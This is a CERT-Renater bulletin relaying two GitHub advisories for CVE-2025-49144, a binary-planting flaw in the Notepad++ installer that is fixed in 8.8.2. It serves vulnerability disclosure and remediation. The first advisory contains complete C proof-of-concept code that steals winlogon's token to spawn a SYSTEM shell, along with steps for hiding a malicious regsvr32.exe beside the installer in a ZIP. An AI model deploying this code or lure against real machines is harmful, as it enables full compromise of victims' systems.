Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN390
_____________________________________________________________________

DATE                : 25/06/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Notepad++ versions prior to 8.8.2.

=====================================================================
https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-g5rj-m8mm-cgw6
https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-9vx8-v79m-6m24
_____________________________________________________________________

Remote Code Execution notepad++ using Uncontrolled Search Path
Vulnerability
High
donho published GHSA-g5rj-m8mm-cgw6 Jun 20, 2025

Package
npp.8.7.8installer.x64.exe (notepad++)

Affected versions
old versions - 8.8.1

Patched versions
8.8.2


Description

Summary

The installer searches for regsvr32.exe in the current working directory
(CWD) if it is not found in the expected path, allowing regsvr32.exe
to be executed. If regsvr32.exe is designed to escalate privileges, it
can further execute cmd.exe with SYSTEM privilege because install
requires the SYSTEM privilege during the installation process.


Test Environment

OS : Windows 11 version 23H2(OS build 22631.5039)
Target : npp.8.7.8installer.x64.exe


Detail

When running the installer of the program and proceeding with the
installation using the default options, the installer fails to locate
regsvr32.exe in the expected path. As a result, it searches for
regsvr32.exe in the current working directory (CWD) and executes it,
leading to a potential security issue. If an attacker places a malicious
regsvr32.exe in the CWD, it can be executed with elevated privileges.
Furthermore, if properly crafted, this can lead to privilege escalation,
ultimately granting SYSTEM-level access.

Root Cause

Improper handling of executable file paths, causing unintended
execution from the current working directory (CWD).


Potential Exploitation Scenarios

An attacker distributes a ZIP archive containing a legitimate
installer alongside a hidden, malicious regsvr32.exe file. To entice
victims into executing the installer, the attacker falsely advertises
the new version as featuring multiple color themes and enhanced
functionality, making it appear more attractive than previous
releases.

Since regsvr32.exe is concealed within the archive, the victim
remains unaware of its presence. Upon extracting the ZIP file
and running the installer, the installer inadvertently searches
for regsvr32.exe in the current working directory (CWD) and
executes it, unknowingly launching the attacker's payload.

This technique increases the likelihood of successful
exploitation, as victims believe they are installing an
upgraded version of the software while the hidden malicious
executable operates unnoticed.


Impact

This vulnerability is a remote code execution (RCE) caused
by an uncontrolled search path.

If the attacker places a malicious regsvr32.exe in the same
directory as the installer, it will be executed when the
victim runs the installer. Since the execution occurs with
SYSTEM privileges, this can lead to significant security
risks, including full system compromise.


How to Reproduce the Vulnerability?

    Create regsvr32.exe with poc code.
    Hide regsvr32.exe and compress it into a ZIP file
along with npp.8.7.8installer.x64.exe
    After extracting the ZIP file, execute
npp.8.7.8installer.x64.exe

PoC code for Privilege Escalation

#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>

BOOL EnablePrivilege(LPCWSTR privilege) {
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }
    LookupPrivilegeValue(NULL, privilege, &tp.Privileges[0].Luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
    CloseHandle(hToken);
    return GetLastError() == ERROR_SUCCESS;
}

HANDLE GetSystemProcessToken() {
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) };
    HANDLE hProcess = NULL, hToken = NULL, hDupToken = NULL;

    if (Process32First(hProcessSnap, &pe32)) {
        do {
            if (_wcsicmp(pe32.szExeFile, L"winlogon.exe") == 0) {
                hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe32.th32ProcessID);
                if (hProcess) {
                    if (OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken)) {
                        DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hDupToken);
                    }
                    CloseHandle(hProcess);
                    CloseHandle(hToken);
                }
                break;
            }
        } while (Process32Next(hProcessSnap, &pe32));
    }
    CloseHandle(hProcessSnap);
    return hDupToken;
}

int main() {
    if (!EnablePrivilege(SE_DEBUG_NAME)) {
        printf("Failed to enable SeDebugPrivilege.\n");
        return 1;
    }

    HANDLE hSystemToken = GetSystemProcessToken();
    if (!hSystemToken) {
        printf("Failed to obtain SYSTEM token.\n");
        return 1;
    }

    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;

    if (CreateProcessWithTokenW(hSystemToken, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        printf("SYSTEM shell spawned!\n");
    } else {
        printf("Failed to create process with SYSTEM token.\n");
    }
    CloseHandle(hSystemToken);
    return 0;
}

This code creates regsvr32.exe. This program allows obtaining
a cmd.exe with SYSTEM privileges.


Credit

Jinho Jung
Junhyuk Im
Jong Geon KIM
Seungyun LEE
Junwoo Seong
Jeongmin Choi


Severity

High
8.6/ 10
CVSS v3 base metrics
Attack vector
Local
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE ID
CVE-2025-49144

Weaknesses
CWE-427


Credits

    @ijh4723 ijh4723 Finder
    @chocovy chocovy Analyst

_____________________________________________________________________


Privilege Escalation in Notepad++ v8.8.1 Installer via Uncontrolled
Executable Search Path
High
donho published GHSA-9vx8-v79m-6m24 Jun 21, 2025

Package
Notepad++ (Windows)

Affected versions
old versions - v8.8.1

Patched versions
v8.8.2


Description

A privilege escalation vulnerability exists in the Notepad++ v8.8.1
installer that allows unprivileged users to gain SYSTEM-level
privileges through insecure executable search paths. This
vulnerability can be exploited with minimal user interaction.


Vulnerability Details

    Type: Uncontrolled EXE/DLL Search Path (Binary Planting)
    Impact: Local Privilege Escalation to NT AUTHORITY\SYSTEM
    Affected Software: Notepad++ v8.8.1 installer -
Release Date: 2025-05-05
    Severity: High


Technical Overview

The installer searches for executable dependencies in the current
working directory without verification, allowing attackers to place
malicious executables that will be loaded with SYSTEM privileges
during installation.

For more info please refer this blog: Microsoft Secure Loading of
Libraries


Attack Method

    Preparation: Attacker places malicious executable (e.g.,
regsvr32.exe) in directory
    Attack Vector: User downloads and runs Notepad++ v8.8.1
installer
    Execution: Installer loads malicious executable from current
directory with SYSTEM privileges
    Result: Attacker gains complete system control


POC

    Process Monitor logs show the installer searching for
executable in the current directory

    procmon-check

    Proof of concept demonstrated successful privilege
escalation via reverse shell

    Notepad++ exploited

    Video demonstration confirms exploitation success

    Proof of Concept Materials: Google Drive Folder with PoC
and Video


Security Implications

    Privilege Escalation: Unprivileged users gain SYSTEM level
permission
    Code Execution: Arbitrary code runs with elevated privileges
    Data Breach: Potential for sensitive data theft
    Lateral Movement: Compromised system could be used to attack
network


Real-World Attack Scenario

An attacker could use social engineering or clickjacking to
trick users into downloading both the legitimate installer and
a malicious executable to the same directory (typically
Downloads folder - which is known as Vulnerable directory).
Upon running the installer, the attack executes automatically
with SYSTEM privileges.


Similar Vulnerabilities

    CVE-2023-6401 & CVE-2023-47452 - in notepad previous versions
    CVE-2024-44346: Similar binary planting vulnerability
    Dell SupportAssist vulnerability (DSA-2024-312)

Recommendations

    Modify installer to use absolute paths for dependency loading
    Implement digital signature verification of loaded executables
    Create and use secure temporary directories with randomized names
    Follow Microsoft's secure library loading guidance

Conclusion

This is a critical security vulnerability requiring immediate
attention. While Microsoft classifies some binary planting
issues as "Defense-in-Depth," the severity of gaining SYSTEM
privileges with minimal user interaction warrants priority
remediation.


Collaborators

    Shashi Raj - https://github.com/EmperialX
    Yatharth Tyagi - https://github.com/Heated-Yeti
    Kunal Choudhary - https://github.com/kunal0x00


References

    https://www.dell.com/support/kbdoc/en-us/000227899/dsa-2024-312-security-update-for-dell-supportassist-for-home-pcs-installer-file-local-privilege-escalation-vulnerability
    https://unit42.paloaltonetworks.com/vulnerabilities-in-iconics-software-suite/
    https://nvd.nist.gov/vuln/detail/CVE-2025-26624
    https://unit42.paloaltonetworks.com/dll-hijacking-techniques/
    https://support.microsoft.com/en-us/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1


Update

We have identified the root cause of this issue, which leads
to the EXE side-loading vulnerability in Notepad++. The issue
arises because regsvr32 was invoked without specifying its
absolute path, making it susceptible to loading a malicious
executable from the current working directory.


Before (Vulnerable):

ExecWait 'regsvr32 /u /s "$INSTDIR\NppShell_01.dll"'

After (Secure):

ExecWait '$SYSDIR\regsvr32.exe /u /s "$INSTDIR\NppShell_01.dll"'

We made the changes in all the required places.
image

After making these changes, regsvr32 picked up the correct path.
image

According to Microsoft's documentation , regsvr32 is always
located in the System32 directory. Therefore, it's best
practice to use the absolute path to avoid potential
side-loading vulnerabilities.

    Vulnerable code reference:
    ExecWait 'regsvr32 /u /s "$INSTDIR\NppShell_01.dll"'
    View on GitHub


Severity
High
7.3/ 10

CVSS v3 base metrics
Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE ID
CVE-2025-49144

Weaknesses
CWE-272 CWE-276 CWE-427


Credits

    @EmperialX EmperialX Reporter
    @Heated-Yeti Heated-Yeti Reporter
    @kunal0x00 kunal0x00 Reporter


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================